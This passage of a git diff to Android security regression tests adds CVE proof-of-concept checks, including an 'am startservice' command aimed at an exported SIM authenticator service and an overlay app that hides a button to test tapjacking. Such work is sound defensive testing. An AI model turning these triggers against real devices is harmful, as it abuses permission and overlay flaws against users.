testPocCVE_2017_13289() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java index 6b51f0a6b11..e3128f1212e 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java @@ -33,7 +33,6 @@ public class Poc18_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-05") public void testPocCVE_2017_13315() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice()); } @@ -44,7 +43,6 @@ public class Poc18_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-05") public void testPocCVE_2017_13312() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java index 172f0fc300c..64929d9fc24 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java @@ -35,4 +35,26 @@ public class Poc18_07 extends SecurityTestCase { AdbUtils.runPocAssertNoCrashes( "CVE-2018-9424", getDevice(), "android\\.hardware\\.drm@\\d\\.\\d-service"); } + + /* + * CVE-2017-18275 + */ + @Test + @SecurityTest(minPatchLevel = "2018-07") + public void testPocCVE_2017_18275() throws Exception { + String command = + "am startservice " + + "-n com.qualcomm.simcontacts/com.qualcomm.simcontacts.SimAuthenticateService " + + "-a android.accounts.AccountAuthenticator -e account_name cve_2017_18275"; + String result = AdbUtils.runCommandLine( + "pm list packages | grep com.qualcomm.simcontacts", getDevice()); + if (result.contains("com.qualcomm.simcontacts")) { + AdbUtils.runCommandLine("logcat -c", getDevice()); + AdbUtils.runCommandLine(command, getDevice()); + String logcat = AdbUtils.runCommandLine("logcat -d", getDevice()); + assertNotMatchesMultiLine( + "Authenticator: Add SIM account.*ContactsProvider: Accounts changed", + logcat); + } + } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java new file mode 100644 index 00000000000..9c60f67b871 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +import static org.junit.Assert.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class Poc19_04 extends SecurityTestCase { + + /** + * CVE-2018-13895 + */ + @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testPocCVE_2018_13895() throws Exception { + String result = AdbUtils.runCommandLine( + "pm list package com.suntek.mway.rcs.app.service",getDevice()); + assertFalse(result.contains("com.suntek.mway.rcs.app.service")); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java index fe8c239ad95..07f45db0d4e 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java @@ -133,8 +133,8 @@ public class PocPusher extends TestWatcher { } testFile += bitness; } - File localFile = buildHelper.getTestFile(testFile); CLog.i("Pushing local: %s to remote: %s", testFile.toString(), remoteFile); + File localFile = buildHelper.getTestFile(testFile); device.pushFile(localFile, remoteFile); if (cleanup) { filesToCleanup.add(remoteFile); diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java index 2b83077a942..d6430844e4a 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java @@ -20,6 +20,7 @@ import com.android.compatibility.common.util.MetricsReportLog; import com.android.compatibility.common.util.ResultType; import com.android.compatibility.common.util.ResultUnit; import com.android.tradefed.build.IBuildInfo; +import com.android.tradefed.config.Option; import com.android.tradefed.testtype.IBuildReceiver; import com.android.tradefed.testtype.IAbi; import com.android.tradefed.testtype.IAbiReceiver; @@ -58,7 +59,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { private long kernelStartTime; - private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this); private HostsideMainlineModuleDetector mainlineModuleDetector = new HostsideMainlineModuleDetector(this); @Rule public TestName testName = new TestName(); @@ -69,6 +69,11 @@ public class SecurityTestCase extends BaseHostJUnit4Test { private static Map<ITestDevice, String> sTestName = new HashMap<>(); private static Map<ITestDevice, PocPusher> sPocPusher = new HashMap<>(); + @Option(name = "set-kptr_restrict", + description = "If kptr_restrict should be set to 2 after every reboot") + private boolean setKptr_restrict = false; + private boolean ignoreKernelAddress = false; + /** * Waits for device to be online, marks the most recent boottime of the device */ @@ -80,13 +85,23 @@ public class SecurityTestCase extends BaseHostJUnit4Test { // TODO:(badash@): Watch for other things to track. // Specifically time when app framework starts - oomCatcher.start(); sBuildInfo.put(getDevice(), getBuild()); sAbi.put(getDevice(), getAbi()); sTestName.put(getDevice(), testName.getMethodName()); pocPusher.setDevice(getDevice()).setBuild(getBuild()).setAbi(getAbi()); sPocPusher.put(getDevice(), pocPusher); + + if (setKptr_restrict) { + if (getDevice().enableAdbRoot()) { + CLog.i("setting kptr_restrict to 2"); + getDevice().executeShellCommand("echo 2 > /proc/sys/kernel/kptr_restrict"); + getDevice().disableAdbRoot(); + } else { + // not a rootable device + ignoreKernelAddress = true; + } + } } /** @@ -95,8 +110,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { */ @After public void tearDown() throws Exception { - oomCatcher.stop(getDevice().getSerialNumber()); - try { getDevice().waitForDeviceAvailable(90 * 1000); } catch (DeviceNotAvailableException e) { @@ -105,27 +118,11 @@ public class SecurityTestCase extends BaseHostJUnit4Test { getDevice().waitForDeviceAvailable(30 * 1000); } - if (oomCatcher.isOomDetected()) { - // we don't need to check kernel start time if we intentionally rebooted because oom - updateKernelStartTime(); - switch (oomCatcher.getOomBehavior()) { - case FAIL_AND_LOG: - fail("The device ran out of memory."); - break; - case PASS_AND_LOG: - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test."); - break; - case FAIL_NO_LOG: - fail(); - break; - } - } else { - long deviceTime = getDeviceUptime() + kernelStartTime; - long hostTime = System.currentTimeMillis() / 1000; - assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2); + long deviceTime = getDeviceUptime() + kernelStartTime; + long hostTime = System.currentTimeMillis() / 1000; + assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2); - // TODO(badash@): add ability to catch runtime restart - } + // TODO(badash@): add ability to catch runtime restart } public static IBuildInfo getBuildInfo(ITestDevice device) { @@ -180,6 +177,7 @@ public class SecurityTestCase extends BaseHostJUnit4Test { */ public void assertNotKernelPointer(Callable<String> getPtrFunction, ITestDevice deviceToReboot) throws Exception { + assumeFalse("Cannot set kptr_restrict to 2, ignoring kptr test.", ignoreKernelAddress); String ptr = null; for (int i = 0; i < 4; i++) { // ~0.4% chance of false positive ptr = getPtrFunction.call(); @@ -231,7 +229,22 @@ public class SecurityTestCase extends BaseHostJUnit4Test { * Check if a driver is present on a machine. */ protected boolean containsDriver(ITestDevice device, String driver) throws Exception { - boolean containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0; + boolean containsDriver = false; + if (driver.contains("*")) { + // -A list all files but . and .. + // -d directory, not contents + // -1 list one file per line + // -f unsorted + String ls = "ls -A -d -1 -f " + driver; + if (AdbUtils.runCommandGetExitCode(ls, device) == 0) { + String[] expanded = device.executeShellCommand(ls).split("\\R"); + for (String expandedDriver : expanded) { + containsDriver |= containsDriver(device, expandedDriver); + } + } + } else { + containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0; + } MetricsReportLog reportLog = buildMetricsReportLog(getDevice()); reportLog.addValue("path", driver, ResultType.NEUTRAL, ResultUnit.NONE); @@ -267,7 +280,15 @@ public class SecurityTestCase extends BaseHostJUnit4Test { } private long getDeviceUptime() throws DeviceNotAvailableException { - String uptime = getDevice().executeShellCommand("cat /proc/uptime"); + String uptime = null; + int attempts = 5; + do { + if (attempts-- <= 0) { + throw new RuntimeException("could not get device uptime"); + } + getDevice().waitForDeviceAvailable(); + uptime = getDevice().executeShellCommand("cat /proc/uptime").trim(); + } while (uptime.isEmpty()); return Long.parseLong(uptime.substring(0, uptime.indexOf('.'))); } @@ -285,10 +306,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { kernelStartTime = (System.currentTimeMillis() / 1000) - uptime; } - public HostsideOomCatcher getOomCatcher() { - return oomCatcher; - } - /** * Return true if a module is play managed. * diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java index 80fcf24c500..c596244b5ad 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java @@ -46,6 +46,19 @@ public class TestMedia extends SecurityTestCase { ******************************************************************************/ /** + * b/17769851 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + */ + @SecurityTest(minPatchLevel = "2015-12") + @Test + public void testPocCVE_2015_6616() throws Exception { + pocPusher.only64(); + String inputFiles[] = {"cve_2015_6616.mp4"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2015-6616", + AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice()); + } + + /** * b/37239013 * Vulnerability Behaviour: EXIT_VULNERABLE (113) */ @@ -98,6 +111,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-11") @Test public void testPocCVE_2020_0450() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0450", null, getDevice()); } @@ -153,6 +167,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2133() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2133", null, getDevice()); } @@ -163,6 +178,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2134() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2134", null, getDevice()); } @@ -515,7 +531,11 @@ public class TestMedia extends SecurityTestCase { String binaryName = "CVE-2018-9537"; String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); - testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + // example of check crash to skip: + // Abort message: 'frameworks/av/media/extractors/mkv/MatroskaExtractor.cpp:548 CHECK(mCluster) failed.' + testConfig.config = new CrashUtils.Config() + .setProcessPatterns(binaryName) + .appendAbortMessageExcludes("CHECK\\(.*?\\)"); testConfig.config.setSignals(signals); AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); } diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp new file mode 100644 index 00000000000..70015337024 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp @@ -0,0 +1,31 @@ +// Copyright (C) 2021 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +android_test_helper_app { + name: "CVE-2021-0305", + defaults: ["cts_support_defaults"], + srcs: ["src/**/*.java"], + test_suites: [ + "cts", + "vts10", + "sts", + ], + static_libs: [ + "androidx.test.rules", + "androidx.test.uiautomator_uiautomator", + "androidx.test.core", + ], + sdk_version: "current", +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml new file mode 100644 index 00000000000..07131a62ac4 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml @@ -0,0 +1,51 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + --> + +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + xmlns:tools="http://schemas.android.com/tools" + package="android.security.cts.CVE_2021_0305" + android:targetSandboxVersion="2"> + + <uses-permission android:name="android.permission.CAMERA" /> + <uses-permission android:name="android.permission.RECORD_AUDIO" /> + + <application> + <uses-library android:name="android.test.runner" /> + <activity + android:name=".MainActivity" + android:label="ST (Permission)" + android:taskAffinity="android.security.cts.CVE_2021_0305.MainActivity" + android:exported="true"> + + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity + android:name=".OverlayActivity" + android:theme="@style/OverlayTheme" + android:exported="true"/> + + </application> + + <instrumentation + android:name="androidx.test.runner.AndroidJUnitRunner" + android:targetPackage="android.security.cts.CVE_2021_0305" /> + +</manifest> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml new file mode 100644 index 00000000000..20a9812c5dc --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml @@ -0,0 +1,24 @@ +<?xml version="1.0" encoding="utf-8"?> +<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" + android:orientation="vertical" + android:layout_width="match_parent" + android:layout_height="match_parent" + xmlns:tools="http://schemas.android.com/tools" + xmlns:app="http://schemas.android.com/apk/res-auto" + tools:context=".MainActivity"> + + <TextView + android:layout_width="wrap_content" + android:layout_height="wrap_content" + android:text="@string/sample_text" + /> + + <Button + android:id="@+id/testButton1" + android:layout_width="wrap_content" + android:layout_height="wrap_content" + android:text="@string/test_button_label" + android:layout_centerInParent="true" + android:gravity="end|center_vertical" + /> +</LinearLayout> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml new file mode 100644 index 00000000000..815602c6edf --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml @@ -0,0 +1,28 @@ +<resources> + + <attr name="colorOverlay" format="color" /> + <attr name="colorDialog" format="color" /> + <attr name="projectAlpha" format="float" /> + + <!-- Switch between the two to see what's happening behind the attacks --> + <style name="AppTheme" parent="SeeBehind"/> + <!--<style name="AppTheme" parent="AppThemeBase.SeeBehind"/>--> + + <style name="SeeBehind"> + <item name="colorOverlay">#BB4BEFD7</item> + <item name="colorDialog">#88FFFFFF</item> + <item name="projectAlpha">0.0</item> + </style> + + <color name="colorM">#5600D1</color> + + <style name="OverlayTheme" parent="AppTheme"> + <!--<item name="android:windowBackground">@color/colorM</item>--> + <item name="android:windowBackground">@android:color/transparent</item> + <item name="android:windowAnimationStyle">@null</item> + <item name="android:windowIsTranslucent">true</item> + </style> + + + +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml new file mode 100644 index 00000000000..ab8b450c5fb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml @@ -0,0 +1,5 @@ +<resources> + <string name="app_name">CVE_2021_0305</string> + <string name="test_button_label">Test Button</string> + <string name="sample_text">text in activity</string> +</resources>
\ No newline at end of file diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java new file mode 100644 index 00000000000..5634f4f55bb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java @@ -0,0 +1,142 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0305; + +import org.junit.Before; +import org.junit.After; +import org.junit.Test; +import org.junit.runner.RunWith; + +import android.content.Context; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.content.pm.ResolveInfo; +import android.os.SystemClock; +import android.util.Log; + +import static androidx.test.core.app.ApplicationProvider.getApplicationContext; +import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation; +import androidx.test.filters.SdkSuppress; +import androidx.test.runner.AndroidJUnit4; +import androidx.test.uiautomator.By; +import androidx.test.uiautomator.UiDevice; +import androidx.test.uiautomator.UiObject2; +import androidx.test.uiautomator.Until; +import androidx.test.uiautomator.BySelector; + +import static org.hamcrest.CoreMatchers.equalTo; +import static org.hamcrest.CoreMatchers.is; +import static org.hamcrest.CoreMatchers.notNullValue; +import static org.junit.Assert.assertThat; +import static org.junit.Assert.assertFalse; + +/** + * Basic sample for unbundled UiAutomator. + */ +@RunWith(AndroidJUnit4.class) +public class DeviceTest { + + private static final String BASIC_SAMPLE_PACKAGE + = "android.security.cts.CVE_2021_0305"; + private static final int LAUNCH_TIMEOUT_MS = 20000; + private static final String STRING_TO_BE_TYPED = "UiAutomator"; + + private UiDevice mDevice; + + @Before + public void startMainActivityFromHomeScreen() { + + Log.d("CVE", "startMainActivityFromHomeScreen()"); + + // Initialize UiDevice instance + mDevice = UiDevice.getInstance(getInstrumentation()); + + // Start from the home screen + mDevice.pressHome(); + + // Launch the blueprint app + Context context = getApplicationContext(); + assertThat(context, notNullValue()); + PackageManager packageManager = context.getPackageManager(); + assertThat(packageManager, notNullValue()); + final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE); + assertThat(intent, notNullValue()); + + intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); // Clear out any previous instances + context.startActivity(intent); + + // Wait for the app to appear + Log.d("CVE", "wait for the app to appear"); + mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS); + Log.d("CVE", "app appeared"); + } + + @After + public void lastOperation(){ + Log.d("CVE", "lastOperation() wait 20s"); + SystemClock.sleep(20000); + Log.d("CVE", "lastOperation() completed"); + } + + @Test + public void testClick() { + Log.d("CVE", "testClick()"); + boolean clicked = false; + java.util.List<UiObject2> objects; + BySelector selector = By.clickable(true); + String button; + + //Detect "Test Button". + //"Test Button" appears after onResume(). + //mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS); + //waits for onEnterAnimationComplete() to finish. + //So we have LAUNCH_TIMEOUT_MS for the button to appear. + //If the button it still not available then + //we assume the button is obscured and the test passes. + Log.d("CVE", "looking for clickable"); + objects = mDevice.findObjects(selector); + for (UiObject2 o : objects) { + button = o.getText(); + Log.d("CVE", "button:" + button); + + if(button==null){ + //check the next button + continue; + } + + switch(button){ + case "Test Button" : + o.click(); + clicked=true; + Log.i("CVE", "clicked: Test Button"); + break; + default : + //check the next button + continue; + } + + //A button this test is looking for just got pressed. + //Ignore remaining buttons + break; + } + + Log.d("CVE", "testClick() end"); + assertFalse(clicked); + Log.d("CVE", "testClick() passed"); + } +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java new file mode 100644 index 00000000000..50a16228d3e --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java @@ -0,0 +1,64 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0305; + +import android.app.Activity; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.Manifest.permission; +import android.os.Bundle; +import android.os.Handler; +import android.view.View; +import android.widget.EditText; +import android.widget.TextView; +import android.util.Log; +import android.widget.Button; +import android.os.SystemClock; +import static android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION; + + +public class MainActivity extends Activity { + + private static final int REQUEST_CAMERA_PERMISSION = 0; + Button testButton1; + + @Override + public void onCreate(Bundle b) { + super.onCreate(b); + Log.e("CVE", "onCreate"); + setContentView(R.layout.activity_main); + testButton1 = (Button) findViewById(R.id.testButton1);//get id of button + + testButton1.setOnClickListener(new View.OnClickListener() { + @Override + public void onClick(View view) { + Log.d("CVE", "button click received"); + } + }); + } + + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + Log.d("CVE", "MainActivity.onEnterAnimationComplete()"); + + //open OverlayActivity to obstruct MainActivity + Intent intent = new Intent(this, OverlayActivity.class); + intent.setFlags(FLAG_ACTIVITY_NO_ANIMATION); + startActivity(intent); + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java new file mode 100644 index 00000000000..c320e5a9640 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java @@ -0,0 +1,4 @@ +package android.security.cts.CVE_2021_0305; +import android.app.Activity; + +public class OverlayActivity extends Activity {} diff --git a/tests/app/app/src/android/app/stubs/LocalForegroundService.java b/tests/app/app/src/android/app/stubs/LocalForegroundService.java index 3051a183fce..0c096c9c5fd 100644 --- a/tests/app/app/src/android/app/stubs/LocalForegroundService.java +++ b/tests/app/app/src/android/app/stubs/LocalForegroundService.java @@ -31,8 +31,8 @@ import com.android.compatibility.common.util.IBinderParcelable; public class LocalForegroundService extends LocalService { private static final String TAG = "LocalForegroundService"; - protected static final String EXTRA_COMMAND = "LocalForegroundService.command"; - private static final String NOTIFICATION_CHANNEL_ID = "cts/" + TAG; + public static final String EXTRA_COMMAND = "LocalForegroundService.command"; + public static final String NOTIFICATION_CHANNEL_ID = "cts/" + TAG; public static String ACTION_START_FGS_RESULT = "android.app.stubs.LocalForegroundService.RESULT"; diff --git a/tests/app/src/android/app/cts/ActivityManagerApi29Test.java b/tests/app/src/android/app/cts/ActivityManagerApi29Test.java index 28611c55d43..489ea951b88 100644 --- a/tests/app/src/android/app/cts/ActivityManagerApi29Test.java +++ b/tests/app/src/android/app/cts/ActivityManagerApi29Test.java @@ -44,6 +44,7 @@ import android.app.cts.android.app.cts.tools.WatchUidRunner; import android.content.Context; import android.content.Intent; import android.content.pm.PackageManager.NameNotFoundException; +import android.os.SystemClock; import android.permission.cts.PermissionUtils; import android.provider.DeviceConfig; import android.provider.Settings; @@ -201,6 +202,8 @@ public class ActivityManagerApi29Test { */ @Test public void testFgsLocationWithAppOps() throws Exception { + // Sleep 12 seconds to let BAL grace period expire. + SystemClock.sleep(12000); // Start a foreground service with location startSimpleService(); // Wait for state and capability change. diff --git a/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java b/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java index c982cd6888a..09166c32441 100644 --- a/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java +++ b/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java @@ -28,6 +28,7 @@ import android.content.Context; import android.content.pm.ApplicationInfo; import android.content.pm.ServiceInfo; import android.os.Bundle; +import android.os.SystemClock; import android.test.InstrumentationTestCase; public class ActivityManagerFgsBgStartTest extends InstrumentationTestCase { @@ -128,7 +129,8 @@ public class ActivityManagerFgsBgStartTest extends InstrumentationTestCase { CommandReceiver.sendCommand(mContext, CommandReceiver.COMMAND_STOP_ACTIVITY, PACKAGE_NAME_APP1, PACKAGE_NAME_APP1, 0, null); - + // Sleep 12 second to let BAL grace period expire. + SystemClock.sleep(12000); uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE, WatchUidRunner.STATE_CACHED_EMPTY, new Integer(PROCESS_CAPABILITY_NONE)); @@ -183,7 +185,8 @@ public class ActivityManagerFgsBgStartTest extends InstrumentationTestCase { uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE, WatchUidRunner.STATE_TOP, new Integer(PROCESS_CAPABILITY_ALL)); - + // Sleep 12 second to let BAL grace period expire. + SystemClock.sleep(12000); // From package1, start FGSL in package2. CommandReceiver.sendCommand(mContext, CommandReceiver.COMMAND_START_FOREGROUND_SERVICE_LOCATION, @@ -204,7 +207,8 @@ public class ActivityManagerFgsBgStartTest extends InstrumentationTestCase { CommandReceiver.sendCommand(mContext, CommandReceiver.COMMAND_STOP_ACTIVITY, PACKAGE_NAME_APP1, PACKAGE_NAME_APP1, 0, null); - + // Sleep 12 second to let BAL grace period expire. + SystemClock.sleep(12000); uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE, WatchUidRunner.STATE_CACHED_EMPTY, new Integer(PROCESS_CAPABILITY_NONE)); @@ -287,6 +291,8 @@ public class ActivityManagerFgsBgStartTest extends InstrumentationTestCase { uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE, WatchUidRunner.STATE_TOP, new Integer(PROCESS_CAPABILITY_ALL)); + // Sleep 12 second to let BAL grace period expire. + SystemClock.sleep(12000); CommandReceiver.sendCommand(mContext, CommandReceiver.COMMAND_CREATE_FGSL_PENDING_INTENT, PACKAGE_NAME_APP1, PACKAGE_NAME_APP2, 0, null); @@ -318,7 +324,8 @@ public class ActivityManagerFgsBgStartTest extends InstrumentationTestCase { CommandReceiver.sendCommand(mContext, CommandReceiver.COMMAND_STOP_ACTIVITY, PACKAGE_NAME_APP1, PACKAGE_NAME_APP1, 0, null); - + // Sleep 12 second to let BAL grace period expire. + SystemClock.sleep(12000); uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE, WatchUidRunner.STATE_CACHED_EMPTY, new Integer(PROCESS_CAPABILITY_NONE)); diff --git a/tests/app/src/android/app/cts/ApplicationTest.java b/tests/app/src/android/app/cts/ApplicationTest.java index 4b0fc781db6..548a37f59b6 100644 --- a/tests/app/src/android/app/cts/ApplicationTest.java +++ b/tests/app/src/android/app/cts/ApplicationTest.java @@ -37,8 +37,8 @@ import com.android.compatibility.common.util.SystemUtil; */ public class ApplicationTest extends InstrumentationTestCase { private static final String ERASE_FONT_SCALE_CMD = "settings delete system font_scale"; - // 2 is an arbitrary value. - private static final String PUT_FONT_SCALE_CMD = "settings put system font_scale 2"; + // 1.2 is an arbitrary value. + private static final String PUT_FONT_SCALE_CMD = "settings put system font_scale 1.2"; @Override public void tearDown() throws Exception { diff --git a/tests/app/src/android/app/cts/ServiceTest.java b/tests/app/src/android/app/cts/ServiceTest.java index 792ef5d3d83..d2e0776524c 100644 --- a/tests/app/src/android/app/cts/ServiceTest.java +++ b/tests/app/src/android/app/cts/ServiceTest.java @@ -1105,6 +1105,31 @@ public class ServiceTest extends ActivityTestsBase { assertNoNotification(2); } + public void testForegroundService_notificationChannelDeletion() throws Exception { + NotificationManager noMan = mContext.getSystemService(NotificationManager.class); + + // Start service as foreground - it should show notification #1 + mExpectedServiceState = 